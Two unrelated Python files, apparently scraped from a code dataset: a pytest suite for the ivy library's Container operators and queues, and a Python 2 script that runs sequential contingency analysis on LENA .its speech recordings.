def test_container_reverse_scalar_greater_than_or_equal_to(device, call):
container = Container(
{
"a": ivy.array([1], device=device),
"b": {
"c": ivy.array([2], device=device),
"d": ivy.array([3], device=device),
},
}
)
container = 2 >= container
assert np.allclose(ivy.to_numpy(container["a"]), np.array([True]))
assert np.allclose(ivy.to_numpy(container.a), np.array([True]))
assert np.allclose(ivy.to_numpy(container["b"]["c"]), np.array([True]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([True]))
assert np.allclose(ivy.to_numpy(container["b"]["d"]), np.array([False]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([False]))
def test_container_greater_than_or_equal_to(device, call):
container_a = Container(
{
"a": ivy.array([1], device=device),
"b": {
"c": ivy.array([5], device=device),
"d": ivy.array([5], device=device),
},
}
)
container_b = Container(
{
"a": ivy.array([2], device=device),
"b": {
"c": ivy.array([2], device=device),
"d": ivy.array([5], device=device),
},
}
)
container = container_a >= container_b
assert np.allclose(ivy.to_numpy(container["a"]), np.array([False]))
assert np.allclose(ivy.to_numpy(container.a), np.array([False]))
assert np.allclose(ivy.to_numpy(container["b"]["c"]), np.array([True]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([True]))
assert np.allclose(ivy.to_numpy(container["b"]["d"]), np.array([True]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([True]))
def test_container_scalar_and(device, call):
container = Container(
{
"a": ivy.array([True], device=device),
"b": {
"c": ivy.array([True], device=device),
"d": ivy.array([False], device=device),
},
}
)
container = container & True
# ToDo: work out why "container and True" does not work. Perhaps bool(container)
# is called first implicitly?
assert np.allclose(ivy.to_numpy(container["a"]), np.array([True]))
assert np.allclose(ivy.to_numpy(container.a), np.array([True]))
assert np.allclose(ivy.to_numpy(container["b"]["c"]), np.array([True]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([True]))
assert np.allclose(ivy.to_numpy(container["b"]["d"]), np.array([False]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([False]))
def test_container_reverse_scalar_and(device, call):
container = Container(
{
"a": ivy.array([True], device=device),
"b": {
"c": ivy.array([True], device=device),
"d": ivy.array([False], device=device),
},
}
)
container = True and container
assert np.allclose(ivy.to_numpy(container["a"]), np.array([True]))
assert np.allclose(ivy.to_numpy(container.a), np.array([True]))
assert np.allclose(ivy.to_numpy(container["b"]["c"]), np.array([True]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([True]))
assert np.allclose(ivy.to_numpy(container["b"]["d"]), np.array([False]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([False]))
def test_container_and(device, call):
container_a = Container(
{
"a": ivy.array([True], device=device),
"b": {
"c": ivy.array([True], device=device),
"d": ivy.array([False], device=device),
},
}
)
container_b = Container(
{
"a": ivy.array([False], device=device),
"b": {
"c": ivy.array([True], device=device),
"d": ivy.array([False], device=device),
},
}
)
container = container_a and container_b
assert np.allclose(ivy.to_numpy(container["a"]), np.array([False]))
assert np.allclose(ivy.to_numpy(container.a), np.array([False]))
assert np.allclose(ivy.to_numpy(container["b"]["c"]), np.array([True]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([True]))
assert np.allclose(ivy.to_numpy(container["b"]["d"]), np.array([False]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([False]))
def test_container_scalar_or(device, call):
container = Container(
{
"a": ivy.array([True], device=device),
"b": {
"c": ivy.array([True], device=device),
"d": ivy.array([False], device=device),
},
}
)
container = container or False
assert np.allclose(ivy.to_numpy(container["a"]), np.array([True]))
assert np.allclose(ivy.to_numpy(container.a), np.array([True]))
assert np.allclose(ivy.to_numpy(container["b"]["c"]), np.array([True]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([True]))
assert np.allclose(ivy.to_numpy(container["b"]["d"]), np.array([False]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([False]))
def test_container_reverse_scalar_or(device, call):
container = Container(
{
"a": ivy.array([True], device=device),
"b": {
"c": ivy.array([True], device=device),
"d": ivy.array([False], device=device),
},
}
)
container = container or False
assert np.allclose(ivy.to_numpy(container["a"]), np.array([True]))
assert np.allclose(ivy.to_numpy(container.a), np.array([True]))
assert np.allclose(ivy.to_numpy(container["b"]["c"]), np.array([True]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([True]))
assert np.allclose(ivy.to_numpy(container["b"]["d"]), np.array([False]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([False]))
def test_container_or(device, call):
container_a = Container(
{
"a": ivy.array([True], device=device),
"b": {
"c": ivy.array([True], device=device),
"d": ivy.array([False], device=device),
},
}
)
container_b = Container(
{
"a": ivy.array([False], device=device),
"b": {
"c": ivy.array([True], device=device),
"d": ivy.array([False], device=device),
},
}
)
container = container_a or container_b
assert np.allclose(ivy.to_numpy(container["a"]), np.array([True]))
assert np.allclose(ivy.to_numpy(container.a), np.array([True]))
assert np.allclose(ivy.to_numpy(container["b"]["c"]), np.array([True]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([True]))
assert np.allclose(ivy.to_numpy(container["b"]["d"]), np.array([False]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([False]))
def test_container_not(device, call):
container = ~Container(
{
"a": ivy.array([True], device=device),
"b": {
"c": ivy.array([True], device=device),
"d": ivy.array([False], device=device),
},
}
)
assert np.allclose(ivy.to_numpy(container["a"]), np.array([False]))
assert np.allclose(ivy.to_numpy(container.a), np.array([False]))
assert np.allclose(ivy.to_numpy(container["b"]["c"]), np.array([False]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([False]))
assert np.allclose(ivy.to_numpy(container["b"]["d"]), np.array([True]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([True]))
def test_container_scalar_xor(device, call):
if call is helpers.mx_call:
# MXnet arrays do not overload the ^ operator, can add if explicit
# ivy.logical_xor is implemented at some point
pytest.skip()
container = Container(
{
"a": ivy.array([True], device=device),
"b": {
"c": ivy.array([True], device=device),
"d": ivy.array([False], device=device),
},
}
)
container = container != True # noqa
assert np.allclose(ivy.to_numpy(container["a"]), np.array([False]))
assert np.allclose(ivy.to_numpy(container.a), np.array([False]))
assert np.allclose(ivy.to_numpy(container["b"]["c"]), np.array([False]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([False]))
assert np.allclose(ivy.to_numpy(container["b"]["d"]), np.array([True]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([True]))
def test_container_reverse_scalar_xor(device, call):
if call is helpers.mx_call:
# MXnet arrays do not overload the ^ operator, can add if explicit
# ivy.logical_xor is implemented at some point
pytest.skip()
container = Container(
{
"a": ivy.array([True], device=device),
"b": {
"c": ivy.array([True], device=device),
"d": ivy.array([False], device=device),
},
}
)
container = False != container # noqa
assert np.allclose(ivy.to_numpy(container["a"]), np.array([True]))
assert np.allclose(ivy.to_numpy(container.a), np.array([True]))
assert np.allclose(ivy.to_numpy(container["b"]["c"]), np.array([True]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([True]))
assert np.allclose(ivy.to_numpy(container["b"]["d"]), np.array([False]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([False]))
def test_container_xor(device, call):
if call is helpers.mx_call:
# MXnet arrays do not overload the ^ operator, can add if explicit
# ivy.logical_xor is implemented at some point
pytest.skip()
container_a = Container(
{
"a": ivy.array([True], device=device),
"b": {
"c": ivy.array([True], device=device),
"d": ivy.array([False], device=device),
},
}
)
container_b = Container(
{
"a": ivy.array([False], device=device),
"b": {
"c": ivy.array([True], device=device),
"d": ivy.array([False], device=device),
},
}
)
container = container_a != container_b # noqa
assert np.allclose(ivy.to_numpy(container["a"]), np.array([True]))
assert np.allclose(ivy.to_numpy(container.a), np.array([True]))
assert np.allclose(ivy.to_numpy(container["b"]["c"]), np.array([False]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([False]))
assert np.allclose(ivy.to_numpy(container["b"]["d"]), np.array([False]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([False]))
def test_container_shape(device, call):
dict_in = {
"a": ivy.array([[[1.0], [2.0], [3.0]]], device=device),
"b": {
"c": ivy.array([[[2.0], [4.0], [6.0]]], device=device),
"d": ivy.array([[[3.0], [6.0], [9.0]]], device=device),
},
}
container = Container(dict_in)
assert container.shape == [1, 3, 1]
dict_in = {
"a": ivy.array([[[1.0], [2.0], [3.0]]], device=device),
"b": {
"c": ivy.array([[[2.0, 3.0], [4.0, 5.0], [6.0, 7.0]]], device=device),
"d": ivy.array([[[3.0], [6.0], [9.0]]], device=device),
},
}
container = Container(dict_in)
assert container.shape == [1, 3, None]
dict_in = {
"a": ivy.array([[[1.0, 2.0], [2.0, 3.0], [3.0, 4.0]]], device=device),
"b": {
"c": ivy.array([[[2.0, 3.0], [4.0, 5.0], [6.0, 7.0]]], device=device),
"d": ivy.array([[[3.0, 4.0], [6.0, 7.0], [9.0, 10.0]]], device=device),
},
}
container = Container(dict_in)
assert container.shape == [1, 3, 2]
def test_container_shapes(device, call):
dict_in = {
"a": ivy.array([[[1.0], [2.0], [3.0]]], device=device),
"b": {
"c": ivy.array([[[2.0], [4.0]]], device=device),
"d": ivy.array([[9.0]], device=device),
},
}
container_shapes = Container(dict_in).shapes
assert list(container_shapes["a"]) == [1, 3, 1]
assert list(container_shapes.a) == [1, 3, 1]
assert list(container_shapes["b"]["c"]) == [1, 2, 1]
assert list(container_shapes.b.c) == [1, 2, 1]
assert list(container_shapes["b"]["d"]) == [1, 1]
assert list(container_shapes.b.d) == [1, 1]
def test_container_dev_str(device, call):
dict_in = {
"a": ivy.array([[[1.0], [2.0], [3.0]]], device=device),
"b": {
"c": ivy.array([[[2.0], [4.0], [6.0]]], device=device),
"d": ivy.array([[[3.0], [6.0], [9.0]]], device=device),
},
}
container = Container(dict_in)
assert container.dev_str == device
def test_container_create_if_absent(device, call):
dict_in = {
"a": ivy.array([[[1.0], [2.0], [3.0]]], device=device),
"b": {
"c": ivy.array([[[2.0], [4.0], [6.0]]], device=device),
"d": ivy.array([[[3.0], [6.0], [9.0]]], device=device),
},
}
# depth 1
container = Container(dict_in)
container.create_if_absent("a", None, True)
assert np.allclose(ivy.to_numpy(container.a), np.array([[[1.0], [2.0], [3.0]]]))
container.create_if_absent("e", ivy.array([[[4.0], [8.0], [12.0]]]), True)
assert np.allclose(ivy.to_numpy(container.e), np.array([[[4.0], [8.0], [12.0]]]))
# depth 2
container.create_if_absent("f/g", np.array([[[5.0], [10.0], [15.0]]]), True)
assert np.allclose(ivy.to_numpy(container.f.g), np.array([[[5.0], [10.0], [15.0]]]))
def test_container_if_exists(device, call):
dict_in = {
"a": ivy.array([[[1.0], [2.0], [3.0]]], device=device),
"b": {
"c": ivy.array([[[2.0], [4.0], [6.0]]], device=device),
"d": ivy.array([[[3.0], [6.0], [9.0]]], device=device),
},
}
container = Container(dict_in)
assert np.allclose(
ivy.to_numpy(container.if_exists("a")), np.array([[[1.0], [2.0], [3.0]]])
)
assert "c" not in container
assert container.if_exists("c") is None
container["c"] = ivy.array([[[1.0], [2.0], [3.0]]], device=device)
assert np.allclose(
ivy.to_numpy(container.if_exists("c")), np.array([[[1.0], [2.0], [3.0]]])
)
assert container.if_exists("d") is None
container.d = ivy.array([[[1.0], [2.0], [3.0]]], device=device)
assert np.allclose(
ivy.to_numpy(container.if_exists("d")), np.array([[[1.0], [2.0], [3.0]]])
)
def test_jax_pytree_compatibility(device, call):
if call is not helpers.jnp_call:
pytest.skip()
# import
from jax.tree_util import tree_flatten
# dict in
dict_in = {
"a": ivy.array([1], device=device),
"b": {"c": ivy.array([2], device=device), "d": ivy.array([3], device=device)},
}
# container
container = Container(dict_in)
# container flattened
cont_values = tree_flatten(container)[0]
# dict flattened
true_values = tree_flatten(dict_in)[0]
# assertion
for i, true_val in enumerate(true_values):
assert np.array_equal(ivy.to_numpy(cont_values[i]), ivy.to_numpy(true_val))
def test_container_from_queues(device, call):
if "gpu" in device:
# Cannot re-initialize CUDA in forked subprocess. 'spawn'
# start method must be used.
pytest.skip()
if ivy.gpu_is_available() and call is helpers.jnp_call:
# Not found a way to set default device for JAX, and this causes
# issues with multiprocessing and CUDA, even when device=cpu
# ToDo: find a fix for this problem ^^
pytest.skip()
def worker_fn(in_queue, out_queue, load_size, worker_id):
keep_going = True
while keep_going:
try:
keep_going = in_queue.get(timeout=0.1)
except queue.Empty:
continue
out_queue.put(
{
"a": [
ivy.to_native(ivy.array([1.0, 2.0, 3.0], device=device))
* worker_id
]
* load_size
}
)
workers = list()
in_queues = list()
out_queues = list()
queue_load_sizes = [1, 2, 1]
for i, queue_load_size in enumerate(queue_load_sizes):
input_queue = multiprocessing.Queue()
output_queue = multiprocessing.Queue()
worker = multiprocessing.Process(
target=worker_fn, args=(input_queue, output_queue, queue_load_size, i + 1)
)
worker.start()
in_queues.append(input_queue)
out_queues.append(output_queue)
workers.append(worker)
container = Container(
queues=out_queues, queue_load_sizes=queue_load_sizes, queue_timeout=0.25
)
# queue 0
queue_was_empty = False
try:
container[0]
except queue.Empty:
queue_was_empty = True
assert queue_was_empty
in_queues[0].put(True)
assert np.allclose(ivy.to_numpy(container[0].a), np.array([1.0, 2.0, 3.0]))
assert np.allclose(ivy.to_numpy(container[0].a), np.array([1.0, 2.0, 3.0]))
# queue 1
queue_was_empty = False
try:
container[1]
except queue.Empty:
queue_was_empty = True
assert queue_was_empty
queue_was_empty = False
try:
container[2]
except queue.Empty:
queue_was_empty = True
assert queue_was_empty
in_queues[1].put(True)
assert np.allclose(ivy.to_numpy(container[1].a), np.array([2.0, 4.0, 6.0]))
assert np.allclose(ivy.to_numpy(container[1].a), np.array([2.0, 4.0, 6.0]))
assert np.allclose(ivy.to_numpy(container[2].a), np.array([2.0, 4.0, 6.0]))
assert np.allclose(ivy.to_numpy(container[2].a), np.array([2.0, 4.0, 6.0]))
# queue 2
queue_was_empty = False
try:
container[3]
except queue.Empty:
queue_was_empty = True
assert queue_was_empty
in_queues[2].put(True)
assert np.allclose(ivy.to_numpy(container[3].a), np.array([3.0, 6.0, 9.0]))
assert np.allclose(ivy.to_numpy(container[3].a), np.array([3.0, 6.0, 9.0]))
# stop workers
in_queues[0].put(False)
in_queues[1].put(False)
in_queues[2].put(False)
in_queues[0].close()
in_queues[1].close()
in_queues[2].close()
# join workers
for worker in workers:
worker.join()
del container
|
SeqAnalysis2.py | """
The MIT License (MIT)
Copyright (c) 2017 Paul Yoder, Joshua Wade, Kenneth Bailey, Mena Sargios, Joseph Hull, Loraina Lampley
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
import xml.etree.ElementTree as ET
from copy import deepcopy
import os
import threading
import Queue
from Helpers import *
import math
# Event Item
class EItem:
def __init__(self, attr):
self.spkr = attr["spkr"]
self.onset = attr["startTime"]
self.offset = attr["endTime"]
def GetFloatTime(self,arg='onset'):
t = self.onset[2:-1] if arg=='onset' else self.offset[2:-1]
return float(t)
# Event Item List
class EItemList:
def __init__(self, _varMap={}, pid=0, its_filename=''):
self.list = []
self.list_ = []
self._varMap = _varMap
self.seqType = self._varMap["seqType"]
self.pid = pid
self.its_filename = its_filename
self.relevantSpkrs = self._varMap["A"]+','+self._varMap["B"]+','+self._varMap["C"]+',Pause'
self.pauseDur = float(self._varMap["PauseDur"])
self.eventCnt = {"A":0,"B":0,"C":0,"P":0}
self.evTypes = ["A","B","C","P"]
self.contingencies = {"a":0, "b":0, "c":0, "d":0}
self.round = True if "True" in self._varMap["roundingEnabled"] else False
def AddEItem(self, seg, flag=None):
# Specify CHN events as either CHNSP or CHNNSP events
if 'CHN' in seg.attrib["spkr"]:
seg.attrib["spkr"] = self.Modify_CHN_Events(seg)
# Handle first and last events in .its file if they aren't relevant speakers
if (flag is 'Initial' or flag is 'Terminal') and seg.attrib["spkr"] not in self.relevantSpkrs:
seg.attrib["spkr"]="Pause"
if seg.attrib["spkr"] in self.relevantSpkrs:
self.list.append( EItem(seg.attrib) )
def Modify_CHN_Events(self, seg):
CHN_mod = ''
if 'startUtt1' in seg.attrib:
CHN_mod = 'CHNSP'
else:
CHN_mod = 'CHNNSP'
return CHN_mod
def Size(self):
return len(self.list)
def GetItem(self, index):
return self.list[index]
def InsertPauses(self):
self.list_.append(deepcopy(self.list[0]))
for i in range(1,self.Size()):
#determine whether to add pause before copying event
curEvT = self.list[i].GetFloatTime('onset')
preEvT = self.list[i-1].GetFloatTime('offset')
eT = curEvT - preEvT
P = self.pauseDur
if eT >= P:
# calculate number of pauses to insert
numP = 0
if self.round is True:
try:
numP = int( (eT / P) + .5 )
except ZeroDivisionError:
numP = int( (0) + .5)
else:
try:
numP = int( (float(eT) / float(P)) )
except ZeroDivisionError:
numP = int((0) + .5)
for j in range(0,numP):
# insert pause
startTime = preEvT+(j*P)
endTime = min(curEvT,startTime+P)
pAttr = {"spkr":"Pause","startTime":str(startTime),"endTime":str(endTime)}
self.list_.append( EItem(pAttr) )
#add current event
self.list_.append( deepcopy(self.list[i]) )
#free memory used by interim list
self.list = deepcopy(self.list_)
self.list_ = None
def TallyItems(self):
for i in range(0, self.Size()): # iterate over Event Items
for e in self.evTypes:
if self.list[i].spkr in self._varMap[e]:
self.eventCnt[e] += 1
def SeqAn(self):
numItems = self.Size()
# A-->B
if self._varMap['seqType'] == 'A_B':
print 'A-->B Analysis in progress...'
# iterate over event items
for i in range(0, numItems-1):
curr = self.list[i]
next = self.list[i+1]
if curr.spkr in self._varMap["A"] and next.spkr in self._varMap["B"]:
self.contingencies["a"] += 1
elif curr.spkr in self._varMap["A"] and next.spkr not in self._varMap["B"]:
self.contingencies["b"] += 1
elif curr.spkr not in self._varMap["A"] and next.spkr in self._varMap["B"]:
self.contingencies["c"] += 1
elif curr.spkr not in self._varMap["A"] and next.spkr not in self._varMap["B"]:
self.contingencies["d"] += 1
# (A-->B)-->C
elif self._varMap['seqType'] == 'AB_C':
print '(A-->B)-->C Analysis in progress...'
# iterate over event items
for i in range(0, numItems-2):
curr = self.list[i]
nextB = self.list[i+1]
nextC = self.list[i+2]
if curr.spkr in self._varMap["A"] and nextB.spkr in self._varMap["B"] and nextC.spkr in self._varMap["C"]:
self.contingencies["a"] += 1
elif curr.spkr in self._varMap["A"] and nextB.spkr in self._varMap["B"] and nextC.spkr not in self._varMap["C"]:
self.contingencies["b"] += 1
elif not(curr.spkr in self._varMap["A"] and nextB.spkr in self._varMap["B"]) and nextC.spkr in self._varMap["C"]:
self.contingencies["c"] += 1
elif not(curr.spkr in self._varMap["A"] and nextB.spkr in self._varMap["B"]) and nextC.spkr not in self._varMap["C"]:
self.contingencies["d"] += 1
def Header(self):
# Subject ID
h = 'PID,its_filename,'
# Event Counts
for e in self.evTypes:
h += self._varMap[e].replace(",","+") + ','
# Contingencies
h += 'a,b,c,d,OCV'
return h
def ResultsTuple(self):
# Subject ID
rt = self.pid + ',' + self.its_filename.split('/')[-1] + ','
# Event Counts
for e in self.evTypes:
rt += str(self.eventCnt[e]) + ','
# Contingencies
# tokens used for OCV computation
tok_a = float(self.contingencies["a"])
tok_b = float(self.contingencies["b"])
tok_c = float(self.contingencies["c"])
tok_d = float(self.contingencies["d"])
# OCV operant contingency value
OCV = (tok_a / (tok_a + tok_b)) - (tok_c / (tok_c + tok_d))
rt += str(self.contingencies["a"]) + ',' + str(self.contingencies["b"]) + ',' + str(self.contingencies["c"]) + ',' + str(self.contingencies["d"]) + ',' + str(OCV)
return rt
class SeqAnalysis:
def __init__(self, seqData, out_results, stopper):
# extract items from seqData object
self.varMap = seqData.seq_config
# prime for writing output
batch_single = None
if len(seqData.its_dict) > 1:
batch_single = "Batch"
else:
batch_single = "Single"
# setup vars
self.results = []
self.out_results = out_results
self.error_results = []
self.stopper = stopper
self.tLock = threading.Lock()
# kick off threads in batch
while len(seqData.its_dict) > 0:
# prep for run
tempItem = {}
tempDict = {}
threads = []
for i in range(seqData.num_threads):
try:
tempItem = seqData.its_dict.popitem()
tempDict.update({tempItem[0]:tempItem[1]})
except KeyError:
pass # dict is empty
# perform run
for k,v in tempDict.iteritems():
t = threading.Thread(target=self.Perform, args=(k,v,))
t.daemon = True
threads.append(t)
t.start()
# wait for threads
for thread in threads:
thread.join()
if not stopper.is_set():
# write output
output_data = OutData(batch_single, seqData.seq_config,self.results)
if '.xlsx' in seqData.output_format:
output_xlsx(output_data)
if '.csv' in seqData.output_format:
output_csv(output_data)
if '.txt' in seqData.output_format:
ouput_txt(output_data)
# report analysis result
if len(self.error_results) > 0:
self.out_results.append("Failed Sequence Analysis!")
else:
self.out_results.append("Successfully Sequence Analysis!")
def Perform(self, pID, path):
# retrieve work items from queue
if not self.stopper.is_set():
try:
# Announce
print 'Analysis in progress on pID=' + str(pID) + ', file=' + path
# Define necessary objects
eiList = None
tree = None
# INITIALIZE ESSENTIAL OBJECTS
#Init event item list
eiList = EItemList(_varMap=self.varMap, pid=pID, its_filename=path)
#Load xml tree
tree = ET.parse(path)
#Get access to only the conversational segments in the .its file
recNode = tree.find("ProcessingUnit")
segs = list(recNode.iter("Segment"))
# iterate over segments and copy
eiList.AddEItem( segs[0], flag='Initial' )
for i in range(1, len(segs)-1):
eiList.AddEItem( segs[i] )
eiList.AddEItem( segs[-1], flag='Terminal' )
# free memory used by xml tree
tree = None
#Insert contiguous pauses
eiList.InsertPauses()
#Tally each item in the EItemList
eiList.TallyItems()
#Perform primary analysis
eiList.SeqAn()
#write data and break from loop
elh = eiList.Header()
outputContent = ""
with self.tLock:
if len(self.results) == 0:
self.results.append(elh)
outputContent += eiList.ResultsTuple()
# write data with Lock on results
with self.tLock:
self.results.append(outputContent)
# Log All Errors
except Exception as e:
with self.tLock:
self.error_results.append(str(e)) |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.